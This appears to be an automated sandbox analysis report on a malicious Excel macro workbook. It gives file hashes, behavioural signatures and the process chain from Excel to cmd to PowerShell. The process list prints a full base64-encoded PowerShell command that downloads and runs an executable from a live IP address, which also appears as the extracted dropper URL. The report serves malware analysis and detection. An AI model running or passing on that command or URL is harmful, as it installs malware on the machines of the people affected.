Analysis

  • max time kernel
    133s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 22:32

General

  • Target

    6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm

  • Size

    14KB

  • MD5

    70820ac2bb527bb0a10747a06d2c2b0b

  • SHA1

    7289b7ddcdcaa9450c27e1579f36d67a544cee80

  • SHA256

    6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753

  • SHA512

    64be67485be70ac5aa2539a88c9846282d7178e13a46895d4686ff0ce79378bf9ed4ee7bec00cb88abc0e2e8bb41a9b9ef38aa4ff25b4e4dc6334a96ad1ee4b5

  • SSDEEP

    384:A0z+vPw85+pkQ1z7fMc+8Pty4jZwENYBp7zMLmh:p+3ZgkKzDMCXjZwENmdKk

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://84.252.122.205/xcx/system.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Deletes itself 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm"
    1⤵
    • Deletes itself
    • Checks processor information in registry
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:396
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Cxrgbutjpc.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4304
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBCAGUAeABzAGMAbwB5AGEAcABhAHIAYwB5AGgAbgBmAHkALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwA4ADQALgAyADUAMgAuADEAMgAyAC4AMgAwADUALwB4AGMAeAAvAHMAeQBzAHQAZQBtAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1908

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CBB75E00

    Filesize

    21KB

    MD5

    37a9a5f09363b1dc454e5b25a6b8987f

    SHA1

    14a03b0b848ad050ea4695afb675ee12bf0ef356

    SHA256

    710bd0d11aceee2119bc3fd61bfc20e32e7d3503d864a1d927bfb89670f04e4f

    SHA512

    ca184538fe75528b9fd2c2fd733653d1d5b0f885f598b4141c70c108dfcb459e1c0e41607abd0896409709f067196dec6583ced5f1fa941c7580271e9761538d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4422an5d.pid.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe

    Filesize

    1KB

    MD5

    ccbd8bf6fbf1c244343b9df87b99667b

    SHA1

    3d42ddd2295e58f3b6ef449c1a96f01c9e7536d6

    SHA256

    7405c5446bf82088b1ae0525a11f810d6e78e8dbcc9af03b8fc4e7083c9bd8a4

    SHA512

    f71a69dc877f7603272264adfced815a5571ded666bf431e0668af2c3abb5ee93f56dfe64cc0f7c9ebe0f2e65a6159b601d20be42b7fdb9f4dcdbfee23fa772e

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

    Filesize

    1KB

    MD5

    9ae67225ac461c1c8f8152b4155d71aa

    SHA1

    5af72ad52f6aeef3668a90b94ca399fa3b31b744

    SHA256

    799030b52f65e2c223184be15c593499e8ba8e2e39440118515e3408ff769ea0

    SHA512

    29ac6ef0a69c65e4f7cda186d2e4cd692853bf9b7944701f7bbb73316357776f0439bd9ce2a871334e7f6d60435b820c34f2fb5e81ffb2ef93b668947844d951

  • C:\Users\Admin\Documents\Cxrgbutjpc.bat

    Filesize

    587B

    MD5

    31814477e987cc1e94638caa7f39f293

    SHA1

    c3814edcc331117303ced19f53006a4ecd09a833

    SHA256

    de24fa627ca42edfb1e5b46804f6dd0ed41fbcbd900eeeb56abc5cb34c1cadd4

    SHA512

    09a06a533d82dc086c345bd1c5ca92b2d582964c963b89e6e0c11c784effe9e4ecfc5e05f2bd3571437a04bead7c2d9fc053bd82538be17a23a473dc949fc268

  • memory/396-10-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/396-17-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/396-1-0x00007FFEE514D000-0x00007FFEE514E000-memory.dmp

    Filesize

    4KB

  • memory/396-8-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/396-11-0x00007FFEA2BB0000-0x00007FFEA2BC0000-memory.dmp

    Filesize

    64KB

  • memory/396-7-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/396-6-0x00007FFEA5130000-0x00007FFEA5140000-memory.dmp

    Filesize

    64KB

  • memory/396-12-0x00007FFEA2BB0000-0x00007FFEA2BC0000-memory.dmp

    Filesize

    64KB

  • memory/396-14-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/396-16-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/396-18-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/396-9-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/396-13-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/396-15-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/396-5-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/396-45-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/396-0-0x00007FFEA5130000-0x00007FFEA5140000-memory.dmp

    Filesize

    64KB

  • memory/396-2-0x00007FFEA5130000-0x00007FFEA5140000-memory.dmp

    Filesize

    64KB

  • memory/396-4-0x00007FFEA5130000-0x00007FFEA5140000-memory.dmp

    Filesize

    64KB

  • memory/396-3-0x00007FFEA5130000-0x00007FFEA5140000-memory.dmp

    Filesize

    64KB

  • memory/396-118-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/396-119-0x00007FFEE514D000-0x00007FFEE514E000-memory.dmp

    Filesize

    4KB

  • memory/396-123-0x00007FFEE50B0000-0x00007FFEE52A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1908-87-0x000001687FE40000-0x000001687FE62000-memory.dmp

    Filesize

    136KB